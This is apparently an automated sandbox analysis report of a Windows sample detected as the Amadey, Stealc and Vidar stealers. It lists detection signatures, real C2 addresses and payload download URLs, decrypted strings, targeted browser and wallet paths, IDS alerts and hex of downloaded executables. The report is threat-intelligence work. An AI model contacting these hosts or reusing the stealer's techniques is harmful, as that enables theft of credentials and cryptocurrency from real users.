Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1467951
MD5: 16bf3fec4a6dc3fd98a032b500c5b3de
SHA1: 299a6b404e7eeecc50cb6fe526e37f9c2b970ef0
SHA256: d64aab9e3aa0e3f707bfff0b1179a3d4f1bf4e7335c922a85181f8b3c05e7bd5
Tags: exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe.phpefoxrefox Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeOpera Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/freebl3.dll; Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll7 Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php#ZC Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/mozglue.dllw Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: 85.28.47.30/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.30/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dllc Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dllV Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0.2.file.exe.920000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
Source: file.exe.2340.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.30/920475a59bac849d.php"}
Source: explorti.exe.8120.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.82/Hun4Ko/index.phpO Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 26% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php#ZC Virustotal: Detection: 24% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php9 Virustotal: Detection: 20% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php3 Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php8# Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.82/ Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/cost/go.exe00 Virustotal: Detection: 25% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 45% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.file.exe.920000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.920000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.920000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.920000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.920000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.920000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.920000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.920000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.920000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.920000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.920000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.920000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.920000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.920000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.920000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.920000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.920000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.920000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.920000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.920000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.920000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.920000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.920000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.920000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.920000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.920000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.920000.0.unpack String decryptor: http://85.28.47.30
Source: 0.2.file.exe.920000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.file.exe.920000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.file.exe.920000.0.unpack String decryptor: Nice
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.920000.0.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.920000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.920000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.920000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.920000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.920000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.920000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.920000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.920000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.920000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.920000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.920000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.920000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.920000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.920000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.920000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.920000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.920000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.920000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.920000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.920000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.920000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.920000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.920000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.920000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.920000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.920000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.920000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.920000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.920000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.920000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.920000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.920000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.920000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CDB6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1472235456.000000006CE1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1472235456.000000006CE1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49699 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.7:49699 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.30:80 -> 192.168.2.7:49699
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.7:49699 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.30:80 -> 192.168.2.7:49699
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.7:51497 -> 77.91.77.82:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
